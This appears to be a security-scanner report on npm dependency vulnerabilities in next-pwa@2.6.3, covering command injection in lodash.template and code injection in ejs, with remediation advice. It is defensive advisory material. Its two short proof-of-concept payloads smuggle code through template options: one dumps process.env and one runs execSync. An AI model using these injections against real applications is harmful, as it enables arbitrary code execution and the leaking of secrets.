next-pwa@2.6.3

Vulnerabilities: 2 via 2 paths

Dependencies: 299

Source: npm

high severity

Command Injection

  • Vulnerable module: lodash.template
  • Introduced through: workbox-webpack-plugin@5.1.4

Detailed paths

  • Introduced through: next-pwa@2.6.3 workbox-webpack-plugin@5.1.4 workbox-build@5.1.4 lodash.template@4.5.0

Overview

lodash.template is the Lodash method _.template exported as a Node.js module.

Affected versions of this package are vulnerable to Command Injection via template.

PoC

var _ = require('lodash');

_.template('', { variable: '){console.log(process.env)}; with(obj' })()

Remediation

There is no fixed version for lodash.template.

medium severity

Arbitrary Code Injection

  • Vulnerable module: ejs
  • Introduced through: workbox-webpack-plugin@5.1.4

Detailed paths

  • Introduced through: next-pwa@2.6.3 workbox-webpack-plugin@5.1.4 workbox-build@5.1.4 @surma/rollup-plugin-off-main-thread@1.4.2 ejs@2.7.4

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the render and renderFile functions. If external input flows into the options parameter, an attacker is able to run arbitrary code. This includes the filename, compileDebug, and client options.

PoC

let ejs = require('ejs')
ejs.render('./views/test.ejs',{
    filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
    compileDebug: true,
    message: 'test',
    client: true
})

Remediation

Upgrade ejs to version 3.1.6 or higher.